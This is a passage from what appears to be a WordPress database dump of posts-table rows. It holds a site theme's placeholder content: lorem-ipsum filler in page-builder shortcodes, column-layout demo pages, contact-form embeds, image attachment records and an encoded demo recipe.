\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\n\n**You can use tapioca or cornstarch instead.\n\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Summer Booze','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','summer-booze','','','2018-01-06 11:22:49','2018-01-06 11:22:49','',0,'http://succulents.select-themes.com/?p=2145',0,'post','',0),(2168,1,'2018-02-06 12:23:00','2018-02-06 12:23:00','','product-1','','inherit','open','closed','','product-1','','','2018-02-06 12:23:00','2018-02-06 12:23:00','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-1.jpg',0,'attachment','image/jpeg',0),(2169,1,'2018-02-06 12:33:16','2018-02-06 12:33:16','','product-2','','inherit','open','closed','','product-2','','','2018-02-06 12:33:16','2018-02-06 12:33:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-2.jpg',0,'attachment','image/jpeg',0),(2170,1,'2018-02-06 12:56:12','2018-02-06 12:56:12','','product-3','','inherit','open','closed','','product-3','','','2018-02-06 12:56:12','2018-02-06 12:56:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-3.jpg',0,'attachment','image/jpeg',0),(2171,1,'2018-02-06 13:04:49','2018-02-06 13:04:49','','product-4','','inherit','open','closed','','product-4','','','2018-02-06 13:04:49','2018-02-06 13:04:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-4.jpg',0,'attachment','image/jpeg',0),(2173,1,'2018-02-06 13:12:35','2018-02-06 13:12:35','','product-5','','inherit','open','closed','','product-5','','','2018-02-06 13:12:35','2018-02-06 13:12:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-5.jpg',0,'attachment','image/jpeg',0),(2175,1,'2018-02-06 13:12:57','2018-02-06 13:12:57','','product-6','','inherit','open','closed','','product-6','','','2018-02-06 13:12:57','2018-02-06 13:12:57','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-6.jpg',0,'attachment','image/jpeg',0),(2176,1,'2018-02-06 13:13:25','2018-02-06 13:13:25','','product-7','','inherit','open','closed','','product-7','','','2018-02-06 13:13:25','2018-02-06 13:13:25','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-7.jpg',0,'attachment','image/jpeg',0),(2177,1,'2018-02-06 13:13:49','2018-02-06 13:13:49','','product-8','','inherit','open','closed','','product-8','','','2018-02-06 13:13:49','2018-02-06 13:13:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-8.jpg',0,'attachment','image/jpeg',0),(2180,1,'2018-02-06 13:20:59','2018-02-06 13:20:59','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521033447677{padding-top: 79px !important;padding-bottom: 94px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"14px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521033466391{padding-top: 79px !important;padding-bottom: 94px !important;}\" simple_background_color=\"#f4f4f4\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"14px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Blockquote','','publish','closed','closed','','blockquote','','','2018-02-06 13:20:59','2018-02-06 13:20:59','',1336,'http://succulents.select-themes.com/?page_id=2180',0,'page','',0),(2200,1,'2018-02-06 13:38:13','2018-02-06 13:38:13','','h1-img-1','','inherit','open','closed','','h1-img-1','','','2018-02-06 13:38:13','2018-02-06 13:38:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-img-1.png',0,'attachment','image/png',0),(2201,1,'2018-02-06 13:38:14','2018-02-06 13:38:14','','h1-img-2','','inherit','open','closed','','h1-img-2','','','2018-02-06 13:38:14','2018-02-06 13:38:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-img-2.png',0,'attachment','image/png',0),(2202,1,'2018-02-06 13:38:15','2018-02-06 13:38:15','','h1-img-3','','inherit','open','closed','','h1-img-3','','','2018-02-06 13:38:15','2018-02-06 13:38:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-img-3-1.png',0,'attachment','image/png',0),(2207,1,'2018-02-06 13:49:43','2018-02-06 13:49:43','[vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033312537{padding-top: 71px !important;padding-bottom: 52px !important;}\"][vc_column][vc_column_text]\n

IV Columns Layout

\n[/vc_column_text][vc_empty_space height=\"24px\"][vc_row_inner][vc_column_inner width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][vc_column_text]Lorem ipsum dolor sit amet, feugli ao delicata liberavisse id cum, no quote maioru intelleg eat, liber regi one eu sit. Mea cu case ludus integre, vide videre eleifend ex mea. His at soluta regione diceret, cum et.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][vc_column_text]Lorem ipsum dolor sit amet, feugli ao delicata liberavisse id cum, no quote maioru intelleg eat, liber regi one eu sit. Mea cu case ludus integre, vide videre eleifend ex mea. His at soluta regione diceret, cum et.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][vc_column_text]Lorem ipsum dolor sit amet, feugli ao delicata liberavisse id cum, no quote maioru intelleg eat, liber regi one eu sit. Mea cu case ludus integre, vide videre eleifend ex mea. His at soluta regione diceret, cum et.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"1/2\" offset=\"vc_col-lg-3 vc_col-md-6\"][vc_column_text]Lorem ipsum dolor sit amet, feugli ao delicata liberavisse id cum, no quote maioru intelleg eat, liber regi one eu sit. Mea cu case ludus integre, vide videre eleifend ex mea. His at soluta regione diceret, cum et.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033320208{padding-top: 71px !important;padding-bottom: 54px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column][vc_column_text]\n

III Columns Layout

\n[/vc_column_text][vc_empty_space height=\"24px\"][vc_row_inner][vc_column_inner css=\".vc_custom_1473936638912{padding-right: 5% !important;}\" offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Lorem ipsum dolor sit amet, feugiat delicata  libera  id cum, no quo maiorum intellegebat,  regione eu sit. Mea cu case ludus integre, vide viderer eleifend ex mea. His at soluta regione diceret, cum et atqui.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\" css=\".vc_custom_1474448267539{padding-right: 5% !important;}\"][vc_column_text]Lorem ipsum dolor sit amet, feugiat delicata  libera  id cum, no quo maiorum intellegebat,  regione eu sit. Mea cu case ludus integre, vide viderer eleifend ex mea. His at soluta regione diceret, cum et atqui.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\" css=\".vc_custom_1474448274946{padding-right: 5% !important;}\"][vc_column_text]Lorem ipsum dolor sit amet, feugiat delicata  libera  id cum, no quo maiorum intellegebat,  regione eu sit. Mea cu case ludus integre, vide viderer eleifend ex mea. His at soluta regione diceret, cum et atqui.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033330627{padding-top: 71px !important;padding-bottom: 54px !important;}\"][vc_column][vc_column_text]\n

II Columns Layout

\n[/vc_column_text][vc_empty_space height=\"24px\"][vc_row_inner][vc_column_inner width=\"1/2\" css=\".vc_custom_1473935261137{padding-right: 5% !important;}\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis sen serit an, sumo consul mentitum duo ea. Copi osae antiopam ius ea, meis explicari reformi dans vix cu. Ut possit patrio que prodesset est, vivendum concluda turque conclusionemque eam in. Sed te veri partiendo. Ne quod case debitis has, eu eos nonumy soleat feugiat.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis sen serit an, sumo consul mentitum duo ea. Copi osae antiopam ius ea, meis explicari reformi dans vix cu. Ut possit patrio que prodesset est, vivendum concluda turque conclusionemque eam in. Sed te veri partiendo. Ne quod case debitis has, eu eos nonumy soleat feugiat.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033345456{padding-top: 71px !important;padding-bottom: 54px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column][vc_column_text]\n

I Third / II Thirds

\n[/vc_column_text][vc_empty_space height=\"24px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum cons ectetuer usu ut. Vim veniam singulis satenserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans met.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-8 vc_col-md-8\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Vel utroque dissentias ut, ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam ei eirmod consequuntur, quod nostrum bouconis consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosa antiopam iu ea, meis explicari reformidans vix cu. Ut possit patrioque prodesset est.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033351484{padding-top: 71px !important;padding-bottom: 54px !important;}\"][vc_column][vc_column_text]\n

II Thirds / I Third

\n[/vc_column_text][vc_empty_space height=\"24px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-8 vc_col-md-8\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Vel utroque dissentias ut, ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam ei eirmod consequuntur, quod nostrum bouconis consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosa antiopam iu ea, meis explicari reformidans vix cu. Ut possit patrioque prodesset est.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum cons ectetuer usu ut. Vim veniam singulis satenserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans met ulur.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033266580{padding-top: 71px !important;padding-bottom: 54px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column][vc_column_text]\n

I Fourth / III Fourths

\n[/vc_column_text][vc_empty_space height=\"24px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-3 vc_col-md-3\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumon consul menti.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-9 vc_col-md-9\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Veligh utroque dissentias ut, ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam eirmod consequuntur, quod nostrum consect etuer usu ut. Vim veniam sinlis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans vix cu.Ut possit patrioque prodesset est.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033257385{padding-top: 71px !important;padding-bottom: 54px !important;}\"][vc_column][vc_column_text]\n

III Fourths / I Fourth

\n[/vc_column_text][vc_empty_space height=\"24px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-9 vc_col-md-9\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Veligh utroque dissentias ut, ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam eirmod consequuntur, quod nostrum consect etuer usu ut. Vim veniam sinlis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans vix cu.Ut possit patrioque prodesset est.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-3 vc_col-md-3\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumon consul menti.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Columns','','publish','closed','closed','','columns','','','2018-02-06 13:49:43','2018-02-06 13:49:43','',1336,'http://succulents.select-themes.com/?page_id=2207',0,'page','',0),(2217,1,'2018-02-06 14:03:51','2018-02-06 14:03:51','[vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521031121060{padding-top: 99px !important;padding-bottom: 101px !important;}\"][vc_column][contact-form-7 id=\"2495\"][/vc_column][/vc_row][vc_row simple_background_color=\"#f6f6f6\"][vc_column][vc_row_inner row_content_width=\"grid\" css=\".vc_custom_1521031255554{padding-top: 101px !important;padding-bottom: 99px !important;}\"][vc_column_inner width=\"1/2\"][contact-form-7 id=\"159\"][/vc_column_inner][vc_column_inner width=\"1/2\"][contact-form-7 id=\"159\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Contact Form','','publish','closed','closed','','contact-form','','','2018-02-06 14:03:51','2018-02-06 14:03:51','',1336,'http://succulents.select-themes.com/?page_id=2217',0,'page','',0),(2234,1,'2018-02-06 15:15:06','2018-02-06 15:15:06','','h8-background-img-1','','inherit','open','closed','','h8-background-img-1-2','','','2018-02-06 15:15:06','2018-02-06 15:15:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h8-background-img-1-1.jpg',0,'attachment','image/jpeg',0),(2239,1,'2018-02-06 15:24:15','2018-02-06 15:24:15','','h8-novo','','inherit','open','closed','','h8-novo','','','2018-02-06 15:24:15','2018-02-06 15:24:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h8-novo.png',0,'attachment','image/png',0),(2269,1,'2018-02-07 09:39:16','2018-02-07 09:39:16','','h8-img-8','','inherit','open','closed','','h8-img-8','','','2018-02-07 09:39:16','2018-02-07 09:39:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h8-img-8.jpg',0,'attachment','image/jpeg',0),(2278,1,'2020-04-06 13:34:19','2020-04-06 13:34:19','','Long-orange-banan','','inherit','open','closed','','long-orange-banan-3','','','2020-04-06 13:34:36','2020-04-06 13:34:36','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Long-orange-banan.jpg',0,'attachment','image/jpeg',0),(2285,1,'2018-02-07 11:21:52','2018-02-07 11:21:52','','h1-parallax-2','','inherit','open','closed','','h1-parallax-2','','','2018-02-07 11:21:52','2018-02-07 11:21:52','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-parallax-2.jpg',0,'attachment','image/jpeg',0),(2289,1,'2018-02-07 11:27:19','2018-02-07 11:27:19','','t3','','publish','closed','closed','','t3','','','2018-02-07 11:27:19','2018-02-07 11:27:19','',0,'http://succulents.select-themes.com/?post_type=testimonials&p=2289',0,'testimonials','',0),(2290,1,'2018-01-23 04:28:59','2018-01-23 04:28:59','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner width=\"1/2\"][qodef_single_image enable_image_shadow=\"no\" image=\"2073\" image_size=\"full\"][/vc_column_inner][vc_column_inner width=\"1/2\"][qodef_single_image enable_image_shadow=\"no\" image=\"2074\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"45px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\n\n**You can use tapioca or cornstarch instead.\n\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Aorem ipsum dolor sit amet, et offendit quaestio his, tantas labores','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','lorem-ipsum-dolor-sit-amet-et-offendit-quaestio-his-tantas-labores','','','2018-01-23 04:28:59','2018-01-23 04:28:59','',0,'http://succulents.select-themes.com/?p=2290',0,'post','',0),(2296,1,'2018-01-23 03:33:28','2018-01-23 03:33:28','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Aec ex lorem debet, ei sea inani intellegam, cu porro atomorum','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','nec-ex-lorem-debet-ei-sea-inani-intellegam-cu-porro-atomorum','','','2018-01-23 03:33:28','2018-01-23 03:33:28','',0,'http://succulents.select-themes.com/?p=2296',0,'post','',0),(2377,1,'2018-02-07 14:51:20','2018-02-07 14:51:20','','h9-img-7','','inherit','open','closed','','h9-img-7','','','2018-02-07 14:51:20','2018-02-07 14:51:20','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h9-img-7.jpg',0,'attachment','image/jpeg',0),(2387,1,'2018-02-07 15:32:44','2018-02-07 15:32:44','','succulents-logo','','inherit','open','closed','','succulents-logo','','','2018-02-07 15:32:44','2018-02-07 